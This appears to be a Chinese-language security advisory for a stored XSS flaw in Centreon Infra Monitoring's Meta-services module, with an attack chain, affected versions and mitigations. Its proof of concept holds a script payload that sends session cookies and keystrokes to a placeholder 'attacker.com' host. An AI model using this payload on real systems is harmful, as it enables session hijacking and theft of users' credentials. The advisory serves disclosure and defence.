CVE-2025-10023 Centreon Infra Monitoring 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-10023

漏洞类型

存储型XSS（跨站脚本攻击）

CVSS评分

6.2 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

Centreon Infra Monitoring (Services Meta-services模块)

漏洞概述

CVE-2025-10023是Centreon Infra Monitoring产品中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Services Meta-services模块中，由于应用程序在处理用户输入时未能正确对特殊字符进行HTML转义或过滤，导致恶意JavaScript代码可以被永久存储在服务器端。当其他用户访问受污染的页面时，攻击者注入的恶意脚本将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。由于该漏洞需要攻击者具有提升的权限（高权限用户），因此主要威胁来自内部人员的滥用或被入侵的高权限账户。此漏洞影响多个版本的Centreon Infra Monitoring系统，CVSS评分6.2，属于中等严重程度。

技术细节

该存储型XSS漏洞源于Centreon Infra Monitoring的Services Meta-services模块在用户输入处理环节存在安全缺陷。攻击者（需具备高权限）可以在特定的输入字段中注入恶意JavaScript代码，如：<script>alert(document.cookie)</script>。由于应用程序未对这些输入进行充分的输入验证和输出编码，恶意代码会被存储在数据库中。当其他用户访问相关页面或执行特定操作时，服务器从数据库读取并回显这些未经过滤的数据，导致恶意脚本在用户浏览器中执行。攻击者可利用此漏洞窃取受害者的会话令牌、凭据或其他敏感信息，甚至可能通过社会工程学手段诱导受害者执行进一步的操作。由于需要高权限和用户交互（UI:R），漏洞利用复杂度相对较高，但仍构成实际安全风险。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标Centreon版本，确认其位于受影响版本范围内（24.10.0-24.10.8、24.04.0-24.04.15或23.10.0-23.10.25）

STEP 2

步骤2：账户入侵或权限获取

攻击者通过暴力破解、社会工程或其他手段获取具有提升权限的Centreon用户账户凭据

STEP 3

步骤3：定位漏洞注入点

攻击者登录系统后，导航至Services Meta-services模块，识别可注入恶意脚本的输入字段（如服务描述、备注等）

STEP 4

步骤4：注入恶意Payload

在目标输入字段中注入包含恶意JavaScript代码的Payload，该代码会被永久存储在数据库中

STEP 5

步骤5：等待受害者触发

当其他用户（普通用户或管理员）访问受污染的页面或相关功能时，服务器从数据库读取并回显未过滤的数据

STEP 6

步骤6：脚本执行与数据窃取

恶意JavaScript在受害者浏览器中执行，攻击者可窃取会话Cookie、劫持用户会话或获取敏感信息

STEP 7

步骤7：权限提升或横向移动

利用窃取的会话令牌，攻击者可进一步提升权限或横向移动到其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-10023 Stored XSS PoC
// Target: Centreon Infra Monitoring < 24.10.9, < 24.04.16, < 23.10.26
// Attack Vector: Inject malicious JavaScript through Services Meta-services module

// Step 1: Authenticate as high-privilege user
const session = authenticate('admin_user', 'password');

// Step 2: Navigate to Services Meta-services module
goto('/centreon/main.php?p=60901');

// Step 3: Inject stored XSS payload in vulnerable field
// Common vulnerable fields: service description, comment, notes
const xssPayload = '<script>\n  // Steal session cookies
  fetch("https://attacker.com/steal?cookie=" + encodeURIComponent(document.cookie));
  // Or perform keylogging
  document.addEventListener("keypress", function(e) {
    fetch("https://attacker.com/log?key=" + e.key);
  });
</script>';

// Fill in the vulnerable input field
fillInput('meta_service_description', xssPayload);
fillInput('meta_service_comment', xssPayload);

// Step 4: Submit the form
click('submit_button');

// Step 5: When other users view the affected page, the XSS will execute
// The malicious script runs in their browser context

// Cleanup: Remove the injected payload after demonstration
// deleteMetaService(meta_service_id);

影响范围

Centreon Infra Monitoring 24.10.0 - 24.10.8

Centreon Infra Monitoring 24.04.0 - 24.04.15

Centreon Infra Monitoring 23.10.0 - 23.10.25

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）限制高权限账户的使用，仅授予必要权限；2）启用双因素认证增强账户安全；3）实施严格的输入验证和输出编码；4）配置Web应用防火墙（WAF）规则检测和阻止XSS攻击；5）限制Services Meta-services模块的访问权限，仅允许受信任的管理员访问；6）监控异常的用户行为和可疑的JavaScript代码注入行为；7）考虑临时禁用受影响的模块功能，直到完成安全更新。